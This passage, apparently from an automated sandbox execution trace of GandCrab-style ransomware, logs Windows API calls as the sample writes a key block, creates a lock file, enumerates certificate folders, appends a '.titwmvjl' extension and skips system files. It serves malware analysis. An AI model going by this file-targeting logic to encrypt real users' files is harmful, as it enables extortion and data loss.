2\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.470] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0073.471] CloseHandle (hObject=0x2cc) returned 1 [0073.471] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.472] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.472] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x319)) [0073.472] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.472] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.472] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.472] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock") returned 107 [0073.473] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0073.473] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.473] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 83 [0073.473] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0073.473] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503278 [0073.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.474] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.474] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.474] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.474] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock" [0073.474] lstrlenW (lpString=".titwmvjl") returned 9 [0073.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock") returned 107 [0073.474] VirtualAlloc (lpAddress=0x0, dwSize=0x116, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.474] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 116 [0073.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a09d2ca4deb61a.lock") returned 107 [0073.474] lstrlenW (lpString=".lock") returned 5 [0073.474] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.475] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.475] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.475] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.475] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.475] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.475] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.475] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt" [0073.475] lstrlenW (lpString=".titwmvjl") returned 9 [0073.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt") returned 103 [0073.475] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.476] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 112 [0073.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt") returned 103 [0073.476] lstrlenW (lpString=".txt") returned 4 [0073.476] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.476] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.476] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.476] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt") returned 103 [0073.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\TITWMVJL-DECRYPT.txt") returned 103 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.476] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.476] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.477] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0073.477] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0073.477] CloseHandle (hObject=0x2cc) returned 1 [0073.477] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.477] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0073.477] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0073.477] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0073.477] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0073.477] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.478] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.478] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.478] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: 